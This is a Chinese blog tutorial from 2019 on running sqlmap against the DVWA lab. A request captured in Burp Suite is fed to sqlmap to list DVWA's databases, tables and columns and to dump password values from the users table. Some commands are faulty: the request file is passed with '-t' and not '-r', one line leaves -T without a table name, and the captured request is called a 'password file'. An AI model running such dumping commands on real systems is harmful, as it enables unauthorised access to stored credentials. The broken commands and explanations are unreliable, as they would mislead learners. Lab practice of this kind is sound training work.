设置浏览器本地代理
1,浏览器设置本地代理-[不同的浏览器有不同的设置方法]
浏览器设置本地代理.png

Burp Suite设置代理界面
2,BP抓包软件:Burp Suite设置本地代理
Burp Suite设置代理界面.png

设置DVWA难度等级medium
3,浏览器打开DVWA -->DVWA Securlity-->设置难度等级Medium为中级 ,点击Submit
设置难度等级medium.png

DVWA注入界面
4,浏览器打开DVWA-->SQL Injection-->submit

监听拦截界面
5,打开拦截,拦截到这个界面就行。
Burp Suite舰艇界面.png

6,urp Suite 监听到数据包,右键Copy to file 保存到/root/1.txt

7,打开终端,输入命令

sqlmap -t /root/1.txt --dbs #获取所有库
sqlmap -t /root/1.txt -D dvwa -T --tables#获取所有表
sqlmap -t /root/1.txt -D dvwa -T users --columns #获取所有字段
sqlmap -t /root/1.txt -D dvwa -T users -C password --dump #获取所有字段的值

--dbs #获取所有数据库
--tables #获取所有表
--columns #获取所有字段
--dump 获取值
-D #后跟数据库
-T #后跟表名
-C #后跟字段名
/root/1.txt:是密码文件,自己可以写。

dvwa是一个数据库,可以更改

users是dvwa数据库中的表

password 是users 里面的字段

具体操作图片展示:

sqlmap --dbs 获取所有数据库
sqlmap --dbs.png
sqlmap --tables 获取表
sqlmap --tables.png
sqlmap --columns获取所有字段
sqlmap 获取所有字段.png
sqlmap --dump获取password 字段的值
获取password 字段的值.png

最后修改:2019 年 10 月 13 日 05 : 33 PM
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏